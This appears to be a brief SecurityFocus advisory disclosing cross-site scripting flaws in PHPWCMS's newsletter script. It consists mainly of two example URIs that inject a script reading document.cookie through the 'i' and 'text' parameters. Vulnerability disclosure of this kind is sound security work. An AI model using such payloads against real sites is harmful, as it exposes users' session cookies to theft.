PHPWCMS Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/phpwcms/include/inc_act/act_newsletter.php?i=V:target@example.com:<script>alert(document.cookie)</script>)
http://www.example.com/phpwcms/include/inc_act/act_newsletter.php?text=<script>alert(document.cookie)</script>


 

Privacy Statement
Copyright 2010, SecurityFocus